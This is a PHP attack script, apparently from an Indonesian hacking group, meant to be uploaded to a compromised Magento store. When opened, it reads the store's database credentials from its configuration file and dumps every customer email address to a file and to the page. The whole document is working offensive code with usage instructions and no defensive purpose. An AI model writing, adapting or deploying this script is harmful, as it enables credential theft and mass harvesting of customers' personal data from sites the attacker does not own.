Magento Customer Email Dumper

1. <?php
2. // Magento Customer Email Dumper
3. // coded by : Mr. Error 404 - IndoXploit
4. // greetz: res7ock cew - sanjungan jiwa
5. // how: upload this file to your target -> open this file. (target.com/dumper.php) .
6. function ambilKata($param, $kata1, $kata2){
7.     if(strpos($param, $kata1) === FALSE) return FALSE;
8.     if(strpos($param, $kata2) === FALSE) return FALSE;
9.     $start = strpos($param, $kata1) + strlen($kata1);
10.     $end = strpos($param, $kata2, $start);
11.     $return = substr($param, $start, $end - $start);
12.     return $return;
13. }
14. $i = 0;
15. $root = $_SERVER['DOCUMENT_ROOT'];
16. $path = "/app/etc/local.xml";
17. $config = file_get_contents($root.$path);
18. $file = "maling.txt";
19. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
20. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
21. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
22. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
23. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
24. $prefix = $dbprefix."customer_entity";
25.  
26. function simpan($file, $isi) {
27.     $f = fopen($file, "w");
28.     if(@fwrite($f, $isi)) {
29.         return "<a href='$file' target='_blank'>$file</a>";
30.     } else {
31.         return "Gagal simpan file gann.";
32.     }
33.     fclose($f);
34. }
35.  
36. mysql_connect($dbhost, $dbuser, $dbpass) or die('MySQL Error: '.mysql_error());
37. mysql_select_db($dbname) or die('MySQL Error: '.mysql_error());
38. $q = mysql_query("SELECT email FROM $prefix");
39. $email = "";
40. $email_ = "";
41. while($f = mysql_fetch_array($q)) {
42.     $i++;
43.     $email .= $f[email]."\n";
44.     $email_ .= $f[email]."<br>";
45. }
46. echo "Total: <b>".$i."</b> [ ".simpan($file, $email)."] <br><br>
47.      $email_";
48.  
49. ?>